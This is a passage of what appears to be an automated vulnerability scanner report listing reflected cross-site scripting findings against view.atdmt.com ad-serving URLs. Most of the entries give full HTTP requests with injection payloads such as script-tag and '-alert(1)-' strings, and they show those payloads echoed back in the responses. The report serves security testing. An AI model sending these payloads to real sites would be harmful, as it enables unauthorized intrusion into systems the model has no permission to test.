GET /CNT/iview/136138030/directbe861'%3b1d6bf994b83;wi.708;hi.258/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:40 GMT
Connection: close
Content-Length: 6360

<html><head><title>Free Refurb Phones (April 2011) (SMB HP Marquee) (Test A-Color)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTAPBCHOM/RTS2258_SMBHPMrq_RefurbishedPhonesA_708x258.swf?ver=1&clickTag1=!~!click!~!http://clk.atdmt.com/go/136138030/directbe861';1d6bf994b83;wi.708;hi.258;ai.212006521;ct.1/01&clickTag=!~!click!~!http://clk.atdmt.com/go/136138030/directbe861';1d6bf994b83;wi.708;hi.258;ai.212006521;ct.1/01" />
...[SNIP]...

3.690. http://view.atdmt.com/CNT/iview/136138030/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136138030/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cd2d"-alert(1)-"d296e11bc83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/136138030/direct;wi.708;hi.258/01?click=&9cd2d"-alert(1)-"d296e11bc83=1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:34 GMT
Connection: close
Content-Length: 6352

<html><head><title>Free Refurb Phones (April 2011) (SMB HP Marquee) (Test B-Plain)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head
...[SNIP]...
if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginHOM1303164975221();
var _HOM1303164975221_Instance =
{
click : "&9cd2d"-alert(1)-"d296e11bc83=1",
clickThruUrl: "http://clk.atdmt.com/go/136138030/direct;wi.708;hi.258;ai.212006585;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

3.691. http://view.atdmt.com/CNT/iview/136138030/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136138030/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c37bf"><script>alert(1)</script>d3272ab90c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/136138030/direct;wi.708;hi.258/01?click=&c37bf"><script>alert(1)</script>d3272ab90c9=1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:32 GMT
Connection: close
Content-Length: 6414

<html><head><title>Free Shockwave 4G or MiFi (Revised $50 Price) (SMB HP Marquee)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/136138030/direct;wi.708;hi.258;ai.208519257;ct.1/01/" onclick="if(\'&c37bf"><script>alert(1)</script>d3272ab90c9=1\')(new Image).src=\'&c37bf">
...[SNIP]...

3.692. http://view.atdmt.com/CNT/iview/136138030/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136138030/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 522ae'-alert(1)-'4b058d787ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/136138030/direct;wi.708;hi.258/01?click=&522ae'-alert(1)-'4b058d787ed=1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:34 GMT
Connection: close
Content-Length: 6312

<html><head><title>4G Tri-Package (SMB HP Marquee)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;m
...[SNIP]...

if ( "%OOB%" == "1" )
_strContentHOM1302122439004 = _strContentHOM1302122439004.replace(/!~!click!~!/g,'');
else
_strContentHOM1302122439004 = _strContentHOM1302122439004.replace(/!~!click!~!/g,'&522ae'-alert(1)-'4b058d787ed=1');
}
else
{
_strContentHOM1302122439004 = '<a target="_blank" href="http://clk.atdmt.com/go/136138030/direct;wi.708;hi.258;ai.208652350;ct.1/01/" onclick="if(\'&522ae'-alert(1)-'4b058d787ed=1
...[SNIP]...

3.693. http://view.atdmt.com/CNT/iview/136138030/direct [wi.708;hi.258/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136138030/direct

Issue detail

The value of the wi.708;hi.258/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87d41</script><script>alert(1)</script>72688c0ccc4 was submitted in the wi.708;hi.258/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/136138030/direct;wi.708;hi.258/01?click=87d41</script><script>alert(1)</script>72688c0ccc4 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:31 GMT
Connection: close
Content-Length: 6443

<html><head><title>Office at Hand (Animation Speed Update) (SMB HP Marquee)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body
...[SNIP]...
e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginHOM1297991775610();
var _HOM1297991775610_Instance =
{
click : "87d41</script><script>alert(1)</script>72688c0ccc4",
clickThruUrl: "http://clk.atdmt.com/go/136138030/direct;wi.708;hi.258;ai.203669861;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

3.694. http://view.atdmt.com/CNT/iview/136138030/direct [wi.708;hi.258/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136138030/direct

Issue detail

The value of the wi.708;hi.258/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4155a'-alert(1)-'5e147c884bf was submitted in the wi.708;hi.258/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/136138030/direct;wi.708;hi.258/01?click=4155a'-alert(1)-'5e147c884bf HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:31 GMT
Connection: close
Content-Length: 6317

<html><head><title>Free Shockwave 4G or MiFi (Revised $50 Price) (SMB HP Marquee)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
...[SNIP]...
;
if ( "%OOB%" == "1" )
_strContentHOM1302045269470 = _strContentHOM1302045269470.replace(/!~!click!~!/g,'');
else
_strContentHOM1302045269470 = _strContentHOM1302045269470.replace(/!~!click!~!/g,'4155a'-alert(1)-'5e147c884bf');
}
else
{
_strContentHOM1302045269470 = '<a target="_blank" href="http://clk.atdmt.com/go/136138030/direct;wi.708;hi.258;ai.208519257;ct.1/01/" onclick="if(\'4155a'-alert(1)-'5e147c884bf\')(n
...[SNIP]...

3.695. http://view.atdmt.com/CNT/iview/136476399/direct [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://view.atdmt.com
Path:	/CNT/iview/136476399/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5692'%3b6e40fed297f was submitted in the REST URL parameter 4. This input was echoed as e5692';6e40fed297f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /CNT/iview/136476399/directe5692'%3b6e40fed297f;wi.228;hi.123/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:43 GMT
Connection: close
Content-Length: 6346

<html><head><title>Employee Discounts (Feb 2011 Update) (Callout)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="bor
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTAPBCHOM/1675_BizCtr_Callout_EmployeeDiscount_228x123.swf?ver=1&clickTag1=!~!click!~!http://clk.atdmt.com/go/136476399/directe5692';6e40fed297f;wi.228;hi.123;ai.203546303;ct.1/01&clickTag=!~!click!~!http://clk.atdmt.com/go/136476399/directe5692';6e40fed297f;wi.228;hi.123;ai.203546303;ct.1/01" />
...[SNIP]...

3.696. http://view.atdmt.com/CNT/iview/136476399/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136476399/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb34c'-alert(1)-'cccbf7392c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/136476399/direct;wi.228;hi.123/01?click=&eb34c'-alert(1)-'cccbf7392c2=1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:37 GMT
Connection: close
Content-Length: 6339

<html><head><title>Employee Discounts (Feb 2011 Update) (Callout)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="bor
...[SNIP]...

if ( "%OOB%" == "1" )
_strContentHOM1297900628176 = _strContentHOM1297900628176.replace(/!~!click!~!/g,'');
else
_strContentHOM1297900628176 = _strContentHOM1297900628176.replace(/!~!click!~!/g,'&eb34c'-alert(1)-'cccbf7392c2=1');
}
else
{
_strContentHOM1297900628176 = '<a target="_blank" href="http://clk.atdmt.com/go/136476399/direct;wi.228;hi.123;ai.203546303;ct.1/01/" onclick="if(\'&eb34c'-alert(1)-'cccbf7392c2=1
...[SNIP]...

3.697. http://view.atdmt.com/CNT/iview/136476399/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136476399/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46a11"><script>alert(1)</script>7c8877a6012 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/136476399/direct;wi.228;hi.123/01?click=&46a11"><script>alert(1)</script>7c8877a6012=1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:36 GMT
Connection: close
Content-Length: 6387

<html><head><title>Opt-In Advantage (Image 1 CTA Test B-Subscribe Now)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/136476399/direct;wi.228;hi.123;ai.207518999;ct.1/01/" onclick="if(\'&46a11"><script>alert(1)</script>7c8877a6012=1\')(new Image).src=\'&46a11">
...[SNIP]...

3.698. http://view.atdmt.com/CNT/iview/136476399/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136476399/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a404"-alert(1)-"6ce25db91f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/136476399/direct;wi.228;hi.123/01?click=&7a404"-alert(1)-"6ce25db91f5=1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:37 GMT
Connection: close
Content-Length: 6339

<html><head><title>Employee Discounts (Feb 2011 Update) (Callout)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="bor
...[SNIP]...
if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginHOM1297900628176();
var _HOM1297900628176_Instance =
{
click : "&7a404"-alert(1)-"6ce25db91f5=1",
clickThruUrl: "http://clk.atdmt.com/go/136476399/direct;wi.228;hi.123;ai.203546303;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

3.699. http://view.atdmt.com/CNT/iview/136476399/direct [wi.228;hi.123/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136476399/direct

Issue detail

The value of the wi.228;hi.123/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee348</script><script>alert(1)</script>6bddd372d2 was submitted in the wi.228;hi.123/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/136476399/direct;wi.228;hi.123/01?click=ee348</script><script>alert(1)</script>6bddd372d2 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:34 GMT
Connection: close
Content-Length: 6429

<html><head><title>Employee Discounts (Feb 2011 Update) (Callout)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="bor
...[SNIP]...
e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginHOM1297900628176();
var _HOM1297900628176_Instance =
{
click : "ee348</script><script>alert(1)</script>6bddd372d2",
clickThruUrl: "http://clk.atdmt.com/go/136476399/direct;wi.228;hi.123;ai.203546303;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

3.700. http://view.atdmt.com/CNT/iview/136476399/direct [wi.228;hi.123/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136476399/direct

Issue detail

The value of the wi.228;hi.123/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bf43'-alert(1)-'3fa153c8c40 was submitted in the wi.228;hi.123/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/136476399/direct;wi.228;hi.123/01?click=8bf43'-alert(1)-'3fa153c8c40 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:35 GMT
Connection: close
Content-Length: 6324

<html><head><title>Employee Discounts (Feb 2011 Update) (Callout)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="bor
...[SNIP]...
;
if ( "%OOB%" == "1" )
_strContentHOM1297900628176 = _strContentHOM1297900628176.replace(/!~!click!~!/g,'');
else
_strContentHOM1297900628176 = _strContentHOM1297900628176.replace(/!~!click!~!/g,'8bf43'-alert(1)-'3fa153c8c40');
}
else
{
_strContentHOM1297900628176 = '<a target="_blank" href="http://clk.atdmt.com/go/136476399/direct;wi.228;hi.123;ai.203546303;ct.1/01/" onclick="if(\'8bf43'-alert(1)-'3fa153c8c40\')(n
...[SNIP]...

3.701. http://view.atdmt.com/CNT/iview/136476400/direct/01 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://view.atdmt.com
Path:	/CNT/iview/136476400/direct/01

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9d2f'%3bd4eceb18b55 was submitted in the REST URL parameter 4. This input was echoed as f9d2f';d4eceb18b55 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /CNT/iview/136476400/directf9d2f'%3bd4eceb18b55/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
